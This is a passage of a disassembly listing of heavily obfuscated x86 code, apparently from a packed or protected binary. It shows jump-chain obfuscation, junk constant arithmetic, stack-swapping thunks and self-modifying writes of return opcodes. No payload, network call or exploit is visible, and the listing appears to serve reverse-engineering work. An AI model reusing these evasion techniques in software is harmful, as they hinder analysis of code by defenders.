		sub	ebx, 59386B24h
		jmp	sub_446966
; ---------------------------------------------------------------------------

loc_453E4F:				; DATA XREF: sub_43FE9B:loc_43FEA1o
		call	sub_45B048
		push	ebp
		mov	ebp, ecx
		xchg	ebp, [esp]
		mov	ecx, [esp+10h]
		mov	dword ptr [ecx], 10001h
		lea	eax, sub_43B914
		jmp	loc_440147
; ---------------------------------------------------------------------------

loc_453E6F:				; CODE XREF: hvvrg7ie:0043F01Ej
		cmp	ebp, 2A6EE7F6h
		jmp	loc_44A35B
; ---------------------------------------------------------------------------

loc_453E7A:				; CODE XREF: hvvrg7ie:00445281j
		jl	loc_439BB5
		jle	loc_439422

; =============== S U B	R O U T	I N E =======================================



sub_453E86	proc near		; CODE XREF: sub_446B4C:loc_44120Cp

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 00451FC3 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045A134 SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		xchg	eax, [esp-4+arg_0]
		mov	edx, eax
		pop	eax
		mov	eax, [esp-8+arg_4]
		jmp	loc_45A134
sub_453E86	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_453E98:				; CODE XREF: hvvrg7ie:0044FF9Cj
		jo	loc_459E17
		cmp	edx, edi
		jmp	loc_44746B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E128

loc_453EA5:				; CODE XREF: sub_43E128:loc_44C66Aj
		jz	loc_441B44
		jmp	loc_443860
; END OF FUNCTION CHUNK	FOR sub_43E128
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C05

loc_453EB0:				; CODE XREF: sub_440C05+D240j
		xor	eax, 4ED05A21h
		add	eax, 7832AED0h
		add	eax, ebp
		add	eax, 6BF89A19h
		mov	eax, [eax]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_45566F
		jmp	loc_455958
; END OF FUNCTION CHUNK	FOR sub_440C05
; ---------------------------------------------------------------------------
		adc	eax, esi
		push	16ADAB39h
		jmp	sub_452488
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456DE7

loc_453EE0:				; CODE XREF: sub_456DE7+Cj
		mov	[ebp+var_8], edx
		mov	[ebp+var_4], eax

loc_453EE6:				; CODE XREF: hvvrg7ie:00459FACj
		mov	edx, [ebp+var_8]
		mov	eax, [ebp+var_4]
		call	sub_453CDE
		jmp	loc_455C29
; END OF FUNCTION CHUNK	FOR sub_456DE7
; ---------------------------------------------------------------------------

loc_453EF6:				; CODE XREF: hvvrg7ie:0043BC4Bj
		sub	ecx, 4FF2B096h

; =============== S U B	R O U T	I N E =======================================



sub_453EFC	proc near		; CODE XREF: hvvrg7ie:00439937p

; FUNCTION CHUNK AT 0044089A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004505ED SIZE 0000001A BYTES
; FUNCTION CHUNK AT 004522CE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004527E9 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00453BFE SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00458C8D SIZE 00000016 BYTES

		xchg	edi, [esp+0]
		pop	edi
		push	0B05E0092h

loc_453F05:				; CODE XREF: hvvrg7ie:0045942Fj
		pop	edx
		jmp	loc_44089A
sub_453EFC	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4533F2

loc_453F0B:				; CODE XREF: sub_4533F2:loc_45B4A1j
		add	edi, ds:4000FBh
		rol	edi, 0Fh
		cmp	edi, 0ED7A5973h
		jmp	loc_4420F4
; END OF FUNCTION CHUNK	FOR sub_4533F2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450434

loc_453F1F:				; CODE XREF: sub_450434:loc_444A12j
		jnz	loc_44EA97
		jmp	loc_44C9E7
; END OF FUNCTION CHUNK	FOR sub_450434
; ---------------------------------------------------------------------------

loc_453F2A:				; CODE XREF: hvvrg7ie:0044A6A5j
		adc	ebp, edi
		jo	loc_443977
		jge	loc_4502FD

loc_453F38:				; CODE XREF: hvvrg7ie:0044A698j
		push	offset loc_452145
		jmp	locret_43A8B1
; ---------------------------------------------------------------------------

loc_453F42:				; CODE XREF: hvvrg7ie:loc_43F88Fj
		call	sub_439549
		test	al, al
		jz	loc_450739
		jmp	loc_443BEB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443BCD

loc_453F54:				; CODE XREF: sub_443BCD:loc_456DFFj
		jz	loc_44AE6C
; END OF FUNCTION CHUNK	FOR sub_443BCD
; START	OF FUNCTION CHUNK FOR sub_43ECAA

loc_453F5A:				; CODE XREF: sub_43ECAA+14D20j
		jmp	nullsub_181
; END OF FUNCTION CHUNK	FOR sub_43ECAA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450D8D

loc_453F5F:				; CODE XREF: sub_450D8D-4655j
		jmp	loc_4400AD
; END OF FUNCTION CHUNK	FOR sub_450D8D
; ---------------------------------------------------------------------------

loc_453F64:				; CODE XREF: hvvrg7ie:0044B7A4j
		jmp	loc_43FEDA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4408AE

loc_453F69:				; CODE XREF: sub_4408AE+Aj
		jmp	loc_453343
; END OF FUNCTION CHUNK	FOR sub_4408AE
; ---------------------------------------------------------------------------
		not	edx
		jmp	loc_44AE66
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44363B

loc_453F75:				; CODE XREF: sub_44363B:loc_452BEBj
		pop	eax
		sub	eax, 0D8796CF7h
		push	offset sub_443BCD
		jmp	nullsub_183
; END OF FUNCTION CHUNK	FOR sub_44363B
; ---------------------------------------------------------------------------
		mov	eax, [esp]
		call	sub_43E7F3
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448BC0

loc_453F8F:				; CODE XREF: sub_448BC0-3F96j
		ror	eax, 0Fh
		add	eax, 0DAC32D66h
		ror	eax, 19h
		jmp	loc_44D755
; END OF FUNCTION CHUNK	FOR sub_448BC0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D247

loc_453FA0:				; CODE XREF: sub_43D247+6j
		rol	eax, 19h
		push	eax
		call	sub_43E7F3
		retn
; END OF FUNCTION CHUNK	FOR sub_43D247
; ---------------------------------------------------------------------------

loc_453FAA:				; CODE XREF: hvvrg7ie:00459550j
		jmp	loc_440EC9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B721

loc_453FAF:				; CODE XREF: sub_45B721+6j
		mov	edx, eax
		call	sub_456DE7
		call	sub_454EC3
; END OF FUNCTION CHUNK	FOR sub_45B721
; START	OF FUNCTION CHUNK FOR sub_43E9D6

loc_453FBB:				; CODE XREF: sub_43E9D6+5j
		jmp	loc_44A6FB
; END OF FUNCTION CHUNK	FOR sub_43E9D6
; ---------------------------------------------------------------------------

loc_453FC0:				; CODE XREF: hvvrg7ie:0043E7A6j
		jmp	loc_44EA5C
; ---------------------------------------------------------------------------

loc_453FC5:				; CODE XREF: hvvrg7ie:00439FA4j
		jmp	loc_44A668
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_453FCA:				; CODE XREF: sub_43F227:loc_4566ECj
					; sub_43F227+1BF90j
		lea	eax, [ebp-2BBh]
		cmp	dword ptr [eax], 47424454h
		jz	loc_43BCB4
		jmp	loc_4525D0
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43A839

loc_453FE1:				; CODE XREF: sub_43A839:loc_45B390j
		push	edx
		push	2004FAFEh
		pop	edx
		or	edx, 5189F4E9h
		add	edx, 8EB79E69h

loc_453FF4:				; CODE XREF: hvvrg7ie:loc_447759j
		mov	[edx], eax
		jmp	loc_444EFD
; END OF FUNCTION CHUNK	FOR sub_43A839
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447E56

loc_453FFB:				; CODE XREF: sub_447E56-E2EAj
		jnz	loc_447347

loc_454001:				; CODE XREF: sub_456904+19j
		jmp	loc_444B87
; END OF FUNCTION CHUNK	FOR sub_447E56
; ---------------------------------------------------------------------------
		mov	[esi], eax
		sbb	ebx, 93EB488h
		jg	loc_456B94
		jmp	loc_4542B3
; ---------------------------------------------------------------------------
		pop	edi
		jmp	loc_45488B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45889B

loc_45401F:				; CODE XREF: sub_45889B-CC1Fj
		jnz	loc_44DE8C

loc_454025:				; CODE XREF: hvvrg7ie:004565A4j
		jmp	loc_43B70D
; END OF FUNCTION CHUNK	FOR sub_45889B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448BE8

loc_45402A:				; CODE XREF: sub_448BE8+Fj
		jmp	loc_4395DC
; END OF FUNCTION CHUNK	FOR sub_448BE8
; ---------------------------------------------------------------------------
		or	eax, 63173DD2h
		adc	ebp, ecx
		xchg	eax, [edi]
		or	edi, edx
; START	OF FUNCTION CHUNK FOR sub_4403D4

loc_45403B:				; CODE XREF: sub_4403D4+18DB5j
		jmp	loc_456F26
; END OF FUNCTION CHUNK	FOR sub_4403D4

; =============== S U B	R O U T	I N E =======================================



sub_454040	proc near		; DATA XREF: hvvrg7ie:00450A9Eo

; FUNCTION CHUNK AT 0043CDEE SIZE 00000007 BYTES

		add	edx, 0FE3F4CF8h
		mov	edx, [edx]
		or	edx, edx
		jnz	loc_43CDEE
		jmp	loc_44D7F0
sub_454040	endp

; ---------------------------------------------------------------------------

loc_454055:				; CODE XREF: hvvrg7ie:00439573j
		adc	ebp, ebx
		cmp	eax, 47D2AAB7h
		jmp	loc_4466E9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_487. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4414F6

loc_454063:				; CODE XREF: sub_4414F6:loc_455CABj
		cmp	edx, 5F882A38h
		jmp	loc_44D0B7
; END OF FUNCTION CHUNK	FOR sub_4414F6
; ---------------------------------------------------------------------------
		dw 8A0Fh
		dd 0FFFF0FA2h, 64DE9h
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451669

loc_454079:				; CODE XREF: sub_451669+1j
		push	0A827F081h
		pop	edx
		rol	edx, 1Ah
		add	edx, 0F9A46210h
		jmp	loc_452530
; END OF FUNCTION CHUNK	FOR sub_451669
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_45408D:				; CODE XREF: sub_43F227+E4Ej
		sub	ebx, 33B1A05h
		push	ecx
		jmp	loc_45009F
; END OF FUNCTION CHUNK	FOR sub_43F227

; =============== S U B	R O U T	I N E =======================================



sub_454099	proc near		; CODE XREF: sub_43E128:loc_441B44p
					; hvvrg7ie:00451609j

var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00439000 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00439B42 SIZE 00000002 BYTES
; FUNCTION CHUNK AT 0043A7CE SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0043B1B0 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043B9DD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043BAED SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0043D3D7 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0043F268 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043FBC0 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00440275 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 00440764 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00440F43 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00441455 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00441905 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 004426BF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004427CE SIZE 00000021 BYTES
; FUNCTION CHUNK AT 00442C65 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00443B7B SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00444286 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00444D4D SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00446AA7 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004471BF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447317 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044747D SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004474E7 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00449B17 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00449FC3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044AC09 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044AE0E SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044BAAB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BF7E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C18C SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044CADA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CF8D SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044DBB7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DCB3 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044DE67 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044F240 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F60E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044FE2F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450342 SIZE 00000004 BYTES
; FUNCTION CHUNK AT 004523E2 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 004528E8 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00453D5E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454178 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004543AA SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00454507 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045507B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456C9B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456DF8 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004575F8 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00457DF6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457E88 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458A6F SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00459117 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 004596C9 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 00459799 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00459C87 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00459DD3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A3A1 SIZE 00000006 BYTES

		xchg	ecx, [esp-4+arg_0]
		pop	ecx
		cmp	dword ptr [ebp-108h], 6C436E6Fh
		jnz	loc_44DCB3
		jmp	loc_44FE2F
sub_454099	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_4540B2	proc near		; CODE XREF: sub_447DE4:loc_4447C9j

var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 004390B3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E58B SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0043F7C1 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00443DAC SIZE 0000001E BYTES
; FUNCTION CHUNK AT 004490C0 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0045052B SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00455F28 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 004577F7 SIZE 00000005 BYTES

		push	ebp
		mov	ebp, edx
		xchg	ebp, [esp+4+var_4]
		call	sub_44F7CF
		call	sub_446407

loc_4540C2:				; CODE XREF: sub_45A889-6B14j
		jmp	loc_43F7C1
sub_4540B2	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452E74

loc_4540C7:				; CODE XREF: sub_452E74+4j
		jmp	loc_447656
; END OF FUNCTION CHUNK	FOR sub_452E74
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4498AE

loc_4540CC:				; CODE XREF: sub_4498AE-DD4Fj
		jmp	sub_448881
; END OF FUNCTION CHUNK	FOR sub_4498AE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4413A5

loc_4540D1:				; CODE XREF: sub_4413A5-3F50j
		jz	loc_442A66
		jmp	loc_442F10
; END OF FUNCTION CHUNK	FOR sub_4413A5
; ---------------------------------------------------------------------------
		rol	ebp, 11h
		jle	loc_43ACB7
		jmp	sub_448FC5
; ---------------------------------------------------------------------------

loc_4540EA:				; DATA XREF: sub_43D369+2o
		pop	esi
		lea	eax, nullsub_6
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_6

; =============== S U B	R O U T	I N E =======================================



sub_4540F9	proc near		; CODE XREF: sub_4055D9+2Bp
					; sub_4540F9:loc_45A300j
					; DATA XREF: ...

; FUNCTION CHUNK AT 0045A300 SIZE 00000006 BYTES

		call	sub_45A310
		jmp	loc_45A300
sub_4540F9	endp

; ---------------------------------------------------------------------------
		push	offset loc_44A062
		jmp	loc_455BB2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_342. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D3B5

loc_45410E:				; CODE XREF: sub_43D3B5+E6A2j
		ja	loc_443053
		mov	edx, [edi]

loc_454116:				; CODE XREF: sub_43D3B5:loc_44BA48j
		rol	edx, 16h
		add	edx, 0C3DAADh
		mov	[edx], eax
		xchg	eax, [esp+0]
		mov	edx, eax
		pop	eax
		jmp	loc_43BB9D
; END OF FUNCTION CHUNK	FOR sub_43D3B5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D285

loc_45412C:				; CODE XREF: sub_43D285:loc_452223j
		call	sub_43B248
		mov	[ebp+var_8], eax
		cmp	[ebp+var_8], 0
		jz	loc_44B743
		jmp	loc_453B09
; END OF FUNCTION CHUNK	FOR sub_43D285
; ---------------------------------------------------------------------------

loc_454143:				; CODE XREF: hvvrg7ie:0044679Aj
		jno	loc_45A57B

loc_454149:				; CODE XREF: hvvrg7ie:00452AC8j
		xor	eax, 0A41D959Dh
		call	sub_450C5A
		mov	ds:off_41D198, eax
		lea	eax, loc_454BEF
		mov	byte ptr [eax],	0C3h
		jmp	loc_450C8E
; ---------------------------------------------------------------------------
		call	nullsub_507
		jmp	ds:dword_41D19C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E68D

loc_454173:				; CODE XREF: sub_44E68D+B0ECj
		jmp	loc_44BFA9
; END OF FUNCTION CHUNK	FOR sub_44E68D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454099

loc_454178:				; CODE XREF: sub_454099-1142Ej
		jmp	loc_43A7CE
; END OF FUNCTION CHUNK	FOR sub_454099
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BEBB

loc_45417D:				; CODE XREF: sub_44BEBB-11C81j
		jmp	loc_446CA9
; END OF FUNCTION CHUNK	FOR sub_44BEBB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4468C2

loc_454182:				; CODE XREF: sub_4468C2+14DEBj
		jz	loc_44E7D9
		mov	[ebx], ebp
		jmp	loc_44803D
; END OF FUNCTION CHUNK	FOR sub_4468C2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458706

loc_45418F:				; CODE XREF: sub_458706-1A387j
					; sub_458706:loc_452A84j
		push	ecx
		mov	ecx, esi
		xchg	ecx, [esp+4+var_4]
		push	34268617h
		pop	esi
		sub	esi, 82E5B31Fh
		and	esi, 1657AB05h
		add	esi, 0F00470EEh
		jmp	loc_4561FB
; END OF FUNCTION CHUNK	FOR sub_458706
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A6D7

loc_4541B2:				; CODE XREF: sub_44A6D7:loc_4593C7j
		xor	eax, ebp
		jmp	loc_441859
; END OF FUNCTION CHUNK	FOR sub_44A6D7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D5FD

loc_4541B9:				; CODE XREF: sub_43D5FD+3537j
		pop	ecx
		sub	ecx, 0AD453BF3h
		and	ecx, 2B2060EEh
		add	ecx, 0F6235602h
		xchg	ecx, [esp+0]
		jmp	sub_44059F
; END OF FUNCTION CHUNK	FOR sub_43D5FD

; =============== S U B	R O U T	I N E =======================================



sub_4541D4	proc near		; CODE XREF: hvvrg7ie:00452A08j
					; sub_450E01+59D8p

var_8		= dword	ptr -8
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00441683 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 00448147 SIZE 00000018 BYTES

		xchg	ecx, [esp+8+var_8]
		pop	ecx
		xchg	esi, [esp+0]
		push	edi
		jmp	loc_441683
sub_4541D4	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_4541E1:				; CODE XREF: hvvrg7ie:0043F839j
		push	0D9ABB69Ah
		pop	ecx
		xor	ecx, 0EA21DC5Dh
		add	ecx, 0D189B5Ah
		shl	ecx, 8
		and	ebx, eax
		jmp	loc_440B68
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45196D

loc_4541FD:				; CODE XREF: sub_45196D+Cj
		mov	eax, [esp+0]
		push	ebx
		mov	ebx, edx
		xchg	ebx, [esp+0]
		push	offset sub_45729C
		jmp	nullsub_186
; END OF FUNCTION CHUNK	FOR sub_45196D
; ---------------------------------------------------------------------------

loc_454210:				; CODE XREF: hvvrg7ie:00440EDEj
		jge	loc_44A692
		mov	ebp, [esi]
		cmp	esi, ebp
		jmp	loc_44A68C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4557D4

loc_45421F:				; CODE XREF: sub_4557D4+54E3j
		or	ecx, edx
		mov	[ecx], esi

loc_454223:				; CODE XREF: sub_4557D4:loc_440FD7j
		lea	edx, [ebp+var_14]
		mov	eax, offset dword_458D58
		call	sub_456DE7
		lea	eax, [ebp+var_14]
		push	eax

loc_454234:				; CODE XREF: hvvrg7ie:00459D9Bj
		jmp	loc_44BEDC
; END OF FUNCTION CHUNK	FOR sub_4557D4
; ---------------------------------------------------------------------------
		jnb	loc_44C52A

; =============== S U B	R O U T	I N E =======================================



sub_45423F	proc near		; CODE XREF: sub_4422A8+Ep

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00439AD4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447473 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044C90C SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044FF89 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00459C30 SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		sub	al, 99h
		jmp	loc_439AD4
sub_45423F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AB90

loc_45424A:				; CODE XREF: sub_44AB90:loc_441DF8j
		jnz	loc_45B2C5
		jmp	loc_459016
; END OF FUNCTION CHUNK	FOR sub_44AB90
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44398A

loc_454255:				; CODE XREF: sub_44398A:loc_44EC74j
		jnz	loc_455350
		jmp	loc_444476
; END OF FUNCTION CHUNK	FOR sub_44398A
; ---------------------------------------------------------------------------
		cmp	dword ptr [ebp-0Ch], 0
		jz	loc_44B743
		jmp	loc_45154F

; =============== S U B	R O U T	I N E =======================================



sub_45426F	proc near		; CODE XREF: sub_446297+17p
					; hvvrg7ie:00449649j

arg_0		= dword	ptr  4

		xchg	eax, [esp+0]
		pop	eax
		xchg	edx, [esp-4+arg_0]
		jmp	sub_451E1C
sub_45426F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FB25

loc_45427B:				; CODE XREF: sub_43FB25+Aj
		xor	esi, 5FD6FE53h
		and	esi, 3A96DAC7h
		xor	esi, 0DBAEB4E4h
		js	loc_44E638
; END OF FUNCTION CHUNK	FOR sub_43FB25
; START	OF FUNCTION CHUNK FOR sub_4425F0

loc_454293:				; CODE XREF: sub_4425F0+1035Ej
		jmp	loc_451226
; END OF FUNCTION CHUNK	FOR sub_4425F0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B9C9

loc_454298:				; CODE XREF: sub_43B9C9+4676j
		pop	ebx

loc_454299:				; CODE XREF: sub_43B9C9:loc_44705Bj
		call	sub_456423
		test	eax, eax
		setnz	byte ptr [ebp-1]
		jmp	loc_439973
; END OF FUNCTION CHUNK	FOR sub_43B9C9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448768

loc_4542A9:				; CODE XREF: sub_448768j
		push	offset sub_454D23
		jmp	loc_45B28F
; END OF FUNCTION CHUNK	FOR sub_448768
; ---------------------------------------------------------------------------

loc_4542B3:				; CODE XREF: hvvrg7ie:00454014j
		cmp	ebp, ebx
		jmp	loc_447341
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45493B

loc_4542BA:				; CODE XREF: sub_45493B+16j
		jl	loc_441BCF

loc_4542C0:				; CODE XREF: sub_4465A6+13241j
		jmp	loc_45952E
; END OF FUNCTION CHUNK	FOR sub_45493B
; ---------------------------------------------------------------------------
		and	ecx, eax
		mov	edi, [ecx]
		add	edx, esi
		jmp	loc_441BCE
; ---------------------------------------------------------------------------

loc_4542D0:				; CODE XREF: hvvrg7ie:0043C349j
		test	eax, esi
		jmp	loc_44FA14
; ---------------------------------------------------------------------------

loc_4542D7:				; DATA XREF: hvvrg7ie:loc_43AC06o
		add	ebx, 0E9B3028Ah
		xchg	ebx, [esp]
		jmp	loc_43A0A1

; =============== S U B	R O U T	I N E =======================================



sub_4542E5	proc near		; CODE XREF: hvvrg7ie:004392F0j
					; hvvrg7ie:0044C7F2p
		xchg	eax, [esp+0]
		pop	eax
		mov	eax, [eax]
		call	sub_457532
sub_4542E5	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_445F72

loc_4542F0:				; CODE XREF: sub_445F72:loc_451593j
		jnz	loc_44BC6A
; END OF FUNCTION CHUNK	FOR sub_445F72
; START	OF FUNCTION CHUNK FOR sub_45493B

loc_4542F6:				; CODE XREF: sub_45493B-12D60j
		jmp	loc_43CE68
; END OF FUNCTION CHUNK	FOR sub_45493B
; ---------------------------------------------------------------------------
		xchg	edx, edi
		jmp	loc_43C4AC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BEBB

loc_454302:				; CODE XREF: sub_44BEBB:loc_4559F2j
		and	eax, 0A9A3C2B3h
		add	eax, 0D723BCFEh
		push	offset sub_44ADCD
		jmp	nullsub_216
; END OF FUNCTION CHUNK	FOR sub_44BEBB

; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_454318	proc near		; CODE XREF: sub_448DB2+FA30j
		retn
sub_454318	endp

; ---------------------------------------------------------------------------

loc_454319:				; CODE XREF: hvvrg7ie:0044E592j
		jmp	sub_44CB64
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4403D4

loc_45431E:				; CODE XREF: sub_4403D4+29FBj
		jmp	loc_4486C5
; END OF FUNCTION CHUNK	FOR sub_4403D4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FC15

loc_454323:				; CODE XREF: hvvrg7ie:loc_43E021j
					; sub_43FC15+122CFj
		not	eax

loc_454325:				; CODE XREF: sub_43FC15:loc_43BD19j
		push	378A24BBh
		xchg	esi, [esp+0]
		mov	eax, esi
		jmp	loc_45596E
; END OF FUNCTION CHUNK	FOR sub_43FC15
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_454334:				; CODE XREF: sub_43F227+111D9j
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_4529AB
		jmp	loc_43AFD4
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EC75

loc_454343:				; CODE XREF: sub_43EC75+17j
		movzx	edx, byte ptr [ecx+edx]
		and	eax, edx
		jz	loc_43C801
		jmp	loc_444494
; END OF FUNCTION CHUNK	FOR sub_43EC75
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C2EA

loc_454354:				; CODE XREF: sub_44C2EA+EDC1j
		jz	loc_44F5A8
		jmp	loc_43C548
; END OF FUNCTION CHUNK	FOR sub_44C2EA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45202B

loc_45435F:				; CODE XREF: sub_45202B:loc_4485BCj
					; hvvrg7ie:loc_452E6Fj
		call	sub_44C072

loc_454364:				; CODE XREF: hvvrg7ie:00439ED1j
					; hvvrg7ie:004567F1j
		push	0C93B922Dh
		pop	eax
		add	eax, 56EDAF8Eh
		or	eax, 4CF04D6Bh
; END OF FUNCTION CHUNK	FOR sub_45202B
; START	OF FUNCTION CHUNK FOR sub_446D8D

